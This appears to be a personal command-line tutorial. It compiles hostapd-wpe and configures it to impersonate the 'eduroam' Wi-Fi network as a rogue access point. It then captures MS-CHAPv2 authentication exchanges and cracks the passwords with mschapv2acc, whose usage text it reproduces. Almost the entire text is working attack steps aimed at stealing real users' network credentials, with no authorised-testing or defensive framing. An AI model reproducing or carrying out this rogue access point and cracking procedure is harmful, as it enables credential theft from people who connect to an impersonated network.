################################################# #My little tutorial to crack passwords for MS-CHAPv2 ################################################ #Compiling and patching hostapd #Download all needed things git clone https://github.com/OpenSecurityResearch/hostapd-wpe wget http://hostap.epitest.fi/releases/hostapd-2.2.tar.gz #Extract tar -zxf hostapd-2.2.tar.gz cd hostapd-2.2 #Patch hostapd-wpe patch -p1 < ../hostapd-wpe/hostapd-wpe.patch cd hostapd/ #if running on x64_86 OS you have to enable crosscompile nano .config ->uncomment the line CONFIG_LIBNL32=y #then compile make #install #sudo make install #setup certs cd ../../hostapd-wpe/certs sudo ./bootstrap #then just in directory where you want to have hostapd-wpe.conf created cd ../../hostapd-2.2/hostapd/ sudo ./hostapd-wpe hostapd-wpe.conf #you will need to configure the hostapd-wpe.conf nano hostapd-wpe.conf interface=wlp8s0mon #change interface to wifi driver= nl80211 # because wifi ssid=eduroam wpa=2 # for WPA2 wpa_pairwise=CCMP #don't forget to switch to monitor mode sudo ./hostapd-wpe hostapd-wpe.conf # to start hostapd-wpe and create a honeypot copy username, challenge and the response for later. ########################### #setting up and running mschapv2aac ########################### #Downloading and Building cd ../../ git clone https://github.com/polkaned/mschapv2acc.git cd mschapv2acc make #converting data captured with hostapd-wpe ./wpe2acc #creates authfile, you'll enter the username, challenge and response. ./mschapv2acc #using mschapv2acc to crack the pass ./mschapv2acc -w Usage: mschapv2acc [Option] file_auth_in Option -x Enable cryptanalyse mode -r number Specify the number maximal of characters, default is 12 (works only with brute force mode) -s Enable MD4 with SSE2 (works only with brute force mode) -i Enter password on standard input, disable brute force mode -w Specify a dictionary file, disable brute force mode -V Verbose mode, output each try (so slow) Example: ./mschapv2acc -x -s file_auth